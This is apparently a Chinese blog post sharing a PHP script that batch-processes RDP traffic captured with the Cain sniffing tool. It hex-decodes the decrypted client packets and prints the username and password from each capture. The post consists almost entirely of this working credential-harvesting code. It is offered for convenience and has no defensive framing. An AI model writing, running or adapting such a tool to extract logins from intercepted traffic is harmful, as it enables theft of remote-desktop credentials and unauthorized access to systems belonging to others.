Cain嗅探到的RDP包批量解析为用户名+密码的php脚本

网上搜了一下有一款工具叫“Cain RDP Parser”，好家伙，一个一个选，玩死人的。。。索性写了个PHP脚本来批量解析。凑合着用。

<?php//Author Wdot//Site:http://wdot.cc//用法 php CainRdpParser.php /tmp/1.txt  ＃单个文件解析//用法 php CainRdpParser.php /tmp/RDP/  #批量解析error_reporting(E_ERROR);if(is_dir($argv[1])){  foreach (scandir($argv[1]) as $key => $value) {    if($value!='.' && $value!='..')    {      rdpParser($argv[1].$value);    }  }}elseif(is_file($argv[1])){  rdpParser($argv[1]);}function rdpParser($filename){  $crlf = "\r\n";  if(!file_exists($filename)){    print "file \"$filename\" not exists...$crlf";    return;  }  $rdpH=fopen($filename,'r');  print "FILE:".basename($filename).$crlf;  fseek($rdpH,0);  while (!feof($rdpH)) {    $line=trim(fgets($rdpH));    if(preg_match("/\w+.address:.*?$/",$line,$m))    {      print $line.$crlf;    }    if(preg_match("/^\[Client decrypted packet\]/",$line,$m))    {      $packet='';      while (!empty($line)) {        $line=trim(fgets($rdpH));        $packet.=substr($line,5,48);      }      $packets=explode('0000000000',str_replace(' ', '', $packet));      $i=count($packets)-27;      $packets=explode('0000',$packets[$i]);      $times=0;      foreach ($packets as $key => $value) {        if(empty($value) || $times>=2)continue;        print (($times==0)?'username':'password').":\t".pack('H*',$value).$crlf;        $times++;              }      break;    }  }  fclose($rdpH);  print "-------------------------------$crlf";}?>